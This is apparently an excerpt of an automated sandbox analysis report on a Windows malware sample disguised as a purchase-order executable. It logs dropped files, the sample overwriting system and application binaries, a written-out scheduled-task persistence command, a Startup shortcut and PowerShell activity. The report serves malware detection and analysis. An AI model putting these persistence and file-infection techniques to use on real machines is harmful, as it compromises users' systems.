                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Users\user\AppData\Local\Temp\Microsofts.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Windows\System32\alg.exeJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,8_2_02BFCBD0

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Users\user\AppData\Roaming\zeXKjViL.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Users\user\AppData\Roaming\zeXKjViL.exe:Zone.Identifier offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Users\user\AppData\Local\Temp\tmp29D3.tmp offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_2024_056209_MQ04865_ENQ_1045.exe.log offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbjhbjfb.ggs.ps1 offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvfd5szs.lt0.psm1 offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w01d5uy.1rp.ps1 offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tv43awin.xsd.psm1 offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 64Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 104Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 262Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 1168Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 1172Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he4vwakp.5ku.ps1 offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gh1bt3rc.i3w.psm1 offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zccguk4f.xmq.ps1 offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wchwsqu1.pcz.psm1 offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 0Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 64Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 104Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 262Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 1168Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 1172Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Users\user\AppData\Roaming\a5f0bea56967b89b.bin offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 95744Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 669260Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 672768Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 1220608Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 1221632Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 1224840Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 669184Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 53125Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 767488Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1341004Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1344512Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1347720Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1340928Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 409168Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 94208Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667724Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 671232Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1219072Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1220096Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1223304Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667648Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 50277Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 663552Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 1237068Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 1238528Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 1241736Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 1236992Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 516101Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Windows\System32\FXSSVC.exe offset: 0Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile written: C:\Users\user\AppData\Local\Temp\Microsofts.exe offset: 0Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeFile written: C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp offset: 0
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeFile written: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zeXKjViL.exe.log offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Windows\System32\config\systemprofile\AppData\Roaming\a5f0bea56967b89b.bin offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0
